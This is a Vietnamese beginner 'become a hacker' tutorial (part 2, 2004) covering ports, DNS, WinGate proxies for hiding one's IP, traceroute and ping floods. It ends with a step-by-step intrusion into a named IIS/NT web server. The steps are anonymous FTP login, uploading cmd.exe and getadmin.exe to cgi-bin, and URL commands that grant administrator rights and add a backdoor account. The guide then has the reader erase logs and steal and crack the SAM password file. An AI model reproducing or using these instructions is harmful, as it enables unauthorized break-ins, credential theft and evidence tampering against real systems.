Những hiểu biết cơ bản nhất để trở thnh Hacker - Phần 2 - 11/10/2004 15h:11

Tc giả: Anhdenday

(Trch: quan tri mang)

Vitual port ( cổng ảo ) l 1 số tự nhin đựợc gi ở trong TCP(Tranmission Control Protocol) v UDP(User Diagram Protocol) header. Như mọi ngui đ biết, Windows c thể chạy nhiều chương trnh 1 lc, mỗi chương trnh ny c 1 cổng ring dng để truyền v nhận dữ liệu.

V dụ 1 my c địa chỉ IP l 127.0.0.1 chạy WebServer, FTP_Server, POP3 server, etc, những dịch vụ ny đều đuọc chạy trn 1 IP address l 127.0.0.1, khi một gi tin đuọc gửi đến lm thế no my tnh của chng ta phn biệt được gi tin ny đi vo dịch vụ no WebServer hay FTP server hay SM! TP? Chnh v thế Port xuất hiện. Mỗi dịch vụ c 1 số port mặc định, v dụ FTP c port mặc định l 21, web service c port mặc định l 80, POP3 l 110, SMTP l 25 vn vn....

Người quản trị mạng c thể thay đổi số port mặc định ny, nếu bạn ko biết số port trn một my chủ, bạn ko thể kết nối vo dịch vụ đ được. Chắc bạn đ từng nghe ni đến PORT MAPPING nhưng c lẽ chưa biết n l g v chức năng thế no. Port mapping thực ra đơn giản chỉ l qu trnh chuyển đổi số port mặc định của một dịch vụ no đ đến 1 số khc. V dụ Port mặc định của WebServer l 80, nhưng thỉnh thoảng c lẽ bạn vẫn thấy http://www.xxx.com:8080 , 8080 ở đy chnh l số port của host xxx nhưng đ đuợc ngui quản trị của host ny ``map`` từ 80 thnh 8080.

( Ti liệu của HVA )

15 . ) DNS l g ?

_ DNS l viết tắt của Domain Name System. Một my chủ DNS đợi kết nối ở cổng số 53, c nghĩa l nếu bạn muốn kết nối vo my chủ đ, bạn phải kết nối đến cổng số 53. My chủ chạy DNS chuyển hostname bằng cc chữ ci thnh cc chữ số tương ứng v ngược lại. V dụ: 127.0.0.1 -- > localhost v localhost--- > 127.0.0.1 .

( Ti liệu của HVA )

16 . ) Đi điều về Wingate :

_ WinGate l một chương trnh đơn giản cho php bạn chia cc kết nối ra. Th dụ: bạn c thể chia sẻ 1 modem với 2 hoặc nhiều my . WinGate dng với nhiều proxy khc nhau c thể che giấu bạn .
_ Lm sao để Wingate c thể che dấu bạn ? Hy lm theo ti : Bạn hy telnet trn cổng 23 trn my chủ chạy WinGate telnet proxy v bạn sẽ c dấu nhắc WinGate > . Tại dấu nhắc ny bạn đnh vo tn server, cng một khoảng trống v cổng bạn muốn kết nối vo. VD :

CODE
telnet wingate.net
WinGate > victim.com 23


ta telnet đến cổng 23 v đy l cổng mặc định khi bạn ci Wingate . lc ny IP trn my m victim chộp được của ta l IP của my chủ chứa Wingate proxy đ .
_ Lm sao để tm Wingate ?
+ Nếu bạn muốn tm IP WinGates tĩnh (IP khng đổi) th đến yahoo hay một trang tm kiếm cable modem. Tm kiếm cable modems v nhiều người dng cable modems c WinGate để họ c thể chia sẻ đường truyền rộng của n cable modems cho những my khc trong cng một nh . Hoặc bạn c thể dng Port hay Domain scanners v scan Port 1080 .
+ Để tm IP động (IP thay đổi mỗi lần user kết nối vo internet) của WinGates bạn c thể dng Domscan hoặc cc chương trnh qut khc . Nếu dng Domscan bạn hy nhập khoảng IP bất kỳ vo box đầu tin v số 23 vo box thứ 2 . Khi đ c kết quả , bạn hy thử lần lượt telnet đến cc địa chỉ IP tm đựơc ( đ hướng dẫn ở trn ), nếu n xuất hiện dấu Wingate > th bạn đ tm đng my đang sử dụng Wingate rồI đ .
+ Theo kinh nghiệm của ti th bạn hy down wingatescanner về m si , n c rất nhiu trn mạng .

17 . ) Đi điều về Traceroute :

_ Traceroute l một chương trnh cho php bạn xc định được đường đi của cc gi packets từ my bạn đến hệ thống đch trn mạng Internet.
_ bạn hy xem VD sau :

CODE
C:\windows > tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms


Ti cần biết đường đi từ my ti đến một host trn mạng Internet c địa chỉ ip l 203.94.12.54. Ti cần phải tracert đến n! Như bạn thấy ở trn, cc gi packets từ my ti muốn đến được 203.94.12.54 phải đi qua 13 hops(mắc xch) trn mạng. Đy l đưng đi của cc gi packets .
_ Bạn hy xem VD tiếp theo :

CODE
host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms


+ Dng đầu tin cho biết hostname v địa chỉ IP của hệ thống đch. Dng ny cn cho chng ta biết thm gi trị TTL<=30 v kch thước của datagram l 40 bytes(20-bytes IP Header + 8-bytes UDP Header + 12-bytes user data).
+ Dng thứ 2 cho biết router đầu tin nhận được datagram l 202.xy.34.12, gi trị của TTL khi gởi đến router ny l 1. Router ny sẽ gởi trở lại cho chương trnh traceroute một ICMP message error ``Time Exceeded``. Traceroute sẽ gởi tiếp một datagram đến hệ thống đch.
+ Dng thứ 3, xyz.com(202.xx.12.34) nhận được datagram c TTL=1(router thứ nhất đ giảm một trước đ - TTL=2-1=1). Tuy nhin, xyz.com khng phải l một router, n sẽ gởi trở lại cho traceroute một ICMP error message ``Port Unreachable``. Khi nhận được ICMP message ny, traceroute sẽ biết được đ đến được hệ thống đch xyz.com v kết thc nhiệm vụ tại đy.
+ Trong trường hợp router khng trả lời sau 5 giy, traceroute sẽ in ra một dấu sao ``*``(khng biết) v tiếp tục gởi datagram khc đến host đch!
_Ch :
Trong windows: tracert hostname
Trong unix: traceroute hostname

( Ti liệu của viethacker.net )

18 . ) Ping v cch sử dụng :

_ Ping l 1 khi niệm rt đơn giản tuy nhin rất hữu ch cho việc chẩn đon mạng. Tiểu sử của từ ``ping`` như sau: Ping l tiếng động vang ra khi 1 tu ngầm muốn biết c 1 vật thể khc ở gần mnh hay ko, nếu c 1 vật thể no đ gần tu ngầm tiếng sng m ny sẽ va vo vật thể đ v tiếng vang lại sẽ l ``pong`` vậy th tu ngầm đ sẽ biết l c g gần mnh.
_Trn Internet, khi niệm Ping cũng rất giống với tiểu sử của n như đ đề cập ở trn. Lệnh Ping gửi một gi ICMP (Internet Control Message Protocol) đến host, nếu host đ ``pong`` lại c nghĩa l host đ tồn tại (hoặc l c thể với tới đựoc). Ping cũng c thể gip chng ta bit được luợng thời gian một gi tin (data packet) đi từ my tnh của mnh đến 1 host no đ.
_Ping thật dễ dng, chỉ cần mở MS-DOS, v g ``ping địa_chỉ_ip``, mặc định sẽ ping 4 lần, nhưng bạn cũng c thể g

CODE
``ping ip.address -t``


Cch ny sẽ lm my ping mi. Để thay đổi kch thước ping lm như sau:

CODE
``ping -l (size) địa_chỉ_ip ``


Ci ping lm l gửi một gi tin đến một my tnh, sau đ xem xem mất bao lu gi tin rồi xem xem sau bao lu gi tin đ quay trở lại, cch ny xc định được tốc độ của kết nối, v thời gian cần để một gi tin đi v quay trở lại v chia bốn (gọi l ``trip time``). Ping cũng c thể được dng để lm chậm đi hoặc đổ vỡ hệ thống bằng lụt ping. Windows 98 treo sau một pht lụt ping (Bộ đệm của kết nối bị trn c qua nhiều kết nối, nn Windows quyết định cho n đi nghỉ một cht). Một cuộc tấn cng ping flood sẽ chiếm rất nhiều băng thng của bạn, v bạn phải c băng thng lớn hơn đối phương ( trừ khi đối phương l một my chạy Windows 98 v bạn c một modem trung bnh, bằng cch đ bạn sẽ hạ gục đối phương sau xấp xỉ một pht lụt ping). Lụt Ping khng hiệu quả lắm đổi với những đối phương mạnh hơn một cht. trừ khi bạn c nhiều đường v bạn kiểm sot một số lượng tương đối cc my chủ cng ping m tổng băng thng lơn hơn đối phương.
Ch : option t của DOS khng gy ra lụt ping, n chỉ ping mục tiu một cch lin tục, với những khoảng ngắt qung giữa hai lần ping lin tiếp. Trong tất cả cc hệ Unix hoặc Linux, bạn c thể dng ping -f để gy ra lụt thực sự. Thực tế l phải ping -f nếu bạn dng một bản tương thch POSIX (POSIX - Portable Operating System Interface dựa trn uniX), nếu khng n sẽ khng phải l một bản Unix/Linux thực sự, bởi vậy nếu bạn dng một hệ điều hnh m n tự cho n l Unix hay Linux, n sẽ c tham số -f.

( Ti liệu của HVA v viethacker.net )

19 . ) Kỹ thuật xm nhập Window NT từ mạng Internet :

_ Đy l bi học hack đầu tin m ti thực hnh khi bắt đầu nghin cứu về hack , by giờ ti sẽ by lại cho cc bạn . bạn sẽ cần phảI c một số thờI gian để thực hiện được n v n tuy dễ nhưng kh . Ta sẽ bắt đầu :
_ Đầu tin bạn cần tm một server chạy IIS :
_ Tiếp đến bạn vo DOS v đnh ` FTP `. VD :

c:\Ftp www.dodgyinc.com

( trang naỳ khi ti thực hnh th vẫn cn lm được , by giờ khng biết họ đ fix chưa , nếu bạn no c trang no khc th hy post ln cho mọI ngườI cng lm nh )
Nếu connect thnh cng , bạn sẽ thấy một số dng tương tự như thế ny :

CODE
Connected to www.dodgyinc.com.
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):


Ci m ta thấy ở trn c chứa những thng tin rất quan trọng , n cho ta biết tn Netbios của my tnh l Vdodgy . Từ điều ny bạn c thể suy diễn ra tn m được sử dụng cho NT để cho php ta c thể khai thc , mặc định m dịch vụ FTP gn cho n nếu n chưa đổi tn sẽ l IUSR_VDODGY . Hy nhớ lấy v n sẽ c ch cho ta . Nhập ``anonymous trong user n sẽ xuất hiện dng sau :

CODE
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:


By giờ passwd sẽ l bất cứ g m ta chưa biết , tuy nhin , bạn hy thử đnh vo passwd l anonymous . Nếu n sai , bạn hy log in lạI thiết bị FTP , bạn hy nhớ l khi ta quay lạI lần ny th khng sử dụng cch mạo danh nữa ( anonymous ) m sử dụng `Guest , thử lại passwd với guest xem thế no .
By giờ bạn hy đnh lệnh trong DOS :

CODE
Cd /c


V sẽ nhn thấy kết quả nếu như bạn đ xm nhập thnh cng , by giờ bạn hy nhanh chng tm thư mục `cgi-bin` . Nếu như bạn may mắn , bạn sẽ tm được dễ dng v thng thường hệ thống quản l đ đặt `cgi-bin` vo nơi m ta vừa xm nhập để cho cc ngườI quản l họ dễ dng điều khiển mạng hơn . thư mục cgi-bin c thể chứa cc chương trnh m bạn c thể lợi dụng n để chạy từ trnh duyệt Web của bạn . Ta hy bắt đầu quậy no greenbiggrin.gif greenbiggrin.gif .
_ Đầu tin , bạn hy chuyển tớ thư mục cgi-bin v sử dụng lệnh Binary ( c thể cc bạn khng cần dng lệnh ny ) , sau đ bạn dnh tiếp lệnh put cmd.exe . Tiếp theo l bạn cần c file hack để ci vo thư mục ny , hy tm trn mạng để lấy 2 file quan trọng nhất đ l `getadmin.exe` v `gasys.dll` . Download chng xuống , một khi bạn đ c n hy ci vo trong thư mục cgi-bin . Ok , coi như mọI việc đ xong , bạn hy đng cửa sổ DOS .
By giờ bạn hy đnh địa chỉ sau ln trnh duyệt của bạn :

http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?IUSR_VDODGY

Sau vi giy bạn sẽ c được cu trả lời như ở dướI đy :

CODE
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator rights!


Thế l bạn đ mạo danh admin để xm nhập hệ thống , việc cần thiết by giờ l bạn hy tự tạo cho mnh một account , hy đnh dng sau trn IE :

http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2 0hacker%20toilahacker%20/add

dng lệnh trn sẽ tạo cho bạn một account login với user : anhdenday v passwd : toilahackerBy giờ bạn hy l cho user ny c account của admin , bạn chỉ cần đnh ln IE lệnh :

http://www.dodgyinc.com/cgi-bin/ge tadmin.exe?anhdenday

Vậy l xong ri đ , bạn hy disconnect v đến start menu - > find rồi search computer `www.dodgyinc.com`. Khi tm thấy , bạn vo explore , explore NT sẽ mở ra bạn hay nhập user v passwd để mở n ( của ti l user : anhdenday v passwd : toilahacker ) .

C một vấn đề l khi bạn xm nhập hệ thống ny th sẽ bị ghi lại , do đ để xo dấu vết bạn hy vo `Winnt\system32\logfiles` mở file log đ rồI xo những thng tin lin quan đến bạn , rồI save chng . Nếu bạn muốn lấy một thng bo g về việc chia sẽ sự xm nhập th bạn hy thay đổi ngy thng trn my tnh vớI URL sau :

http://www.dodgyinc.com/cgi-bin/cm d.exe?/c%20date%2030/04/03

xong rồI bạn hy xo file `getadmin.exe`, v `gasys.dll` từ `cgi-bin` . Mục đch khi ta xm nhập hệ thống ny l chm pass của admin để lần sau xm nhập một cch hợp lệ , do đ bạn hy tm file SAM ( chứa pass của admin v member ) trong hệ thống rồI dng chương trnh l0pht crack để crack pass ( Hướng dẫn về cch sử dụng l0pht crack v 3.02 ti đ post ln rồi ,cc bạn hy tự nghin cứu nh ) . Đy l link : http://vnhacker.org/forum/?act=ST& f=6&t=11566&s=
Khi crack xong cc bạn đ c user v pass của admin rồI , by giờ hy xo account của user ( của ti l anhdenday ) đi cho an ton . Bạn đ c thể lm g trong hệ thống l tuỳ thch , nhưng cc bạn đừng xo hết ti liệu của họ nh , tội cho họ lắm .
Bạn cảm thấy thế no , rắc rối lắm phải khng . Lc ti thử hack cch ny , ti đ my m mất cả 4 giờ , nếu như bạn đ quen th lần thứ 2 bạn sẽ mất t thờI gian hơn .

Ở phần 3 ti sẽ đề cập đến HĐH Linux , đến cch ngắt mật khẩu bảo vệ của một Web site , v lm thế no để hack một trang web đơn giản nhất .v.v

Hết phần 2

Tc giả: Anhdenday - HVAonline